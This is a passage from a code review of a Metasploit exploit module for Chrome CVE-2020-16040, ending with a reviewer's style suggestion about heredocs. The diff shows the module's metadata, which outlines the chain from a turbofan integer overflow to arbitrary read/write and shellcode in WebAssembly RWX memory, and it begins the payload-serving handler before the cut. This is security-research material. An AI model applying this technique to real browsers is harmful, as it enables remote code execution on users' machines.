modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb

```diff
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase',
+        'Description' => %q{
+          This module exploits an issue in Google Chrome versions before 87.0.4280.88 (64 bit).
+          The exploit makes use of a integer overflow in the SimplifiedLowering phase in turbofan.
+          It is used along with a typer hardening bypass using ArrayPrototypeShift to create a JSArray with a length of -1.
+          This is abused to gain arbitrary read/write into the isolate region.
+          Then an ArrayBuffer can be used to achieve absolute arbitrary read/write.
+          The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
+          The payload is executed within the sandboxed renderer process, the browser must be run with the --no-sandbox option for the payload to work correctly.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Rajvardhan Agarwal (r4j)', # exploit
+        ],
+        'References' => [
+          ['CVE', '2020-16040'],
+          ['URL', 'https://chromium-review.googlesource.com/c/v8/v8/+/2557498'],
+          ['URL', 'https://github.com/r4j0x00/exploits/tree/master/CVE-2020-16040'],
+        ],
+        'Arch' => [ ARCH_X64 ],
+        'DefaultTarget' => 0,
+        'Targets' =>
+          [
+            ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],
+            ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],
+            ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],
+          ],
+        'DisclosureDate' => '2021-03-03'
+      )
+    )
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    js_payload = Rex::Text.to_num(payload.raw).gsub(/\n/, '').gsub(/\x0d/, '')
+    jscript = %^
```

Comment:
You could consider using a squiggly heredoc here, e.g `jscript = <<~JS`
https://www.rubyguides.com/2018/11/ruby-heredoc/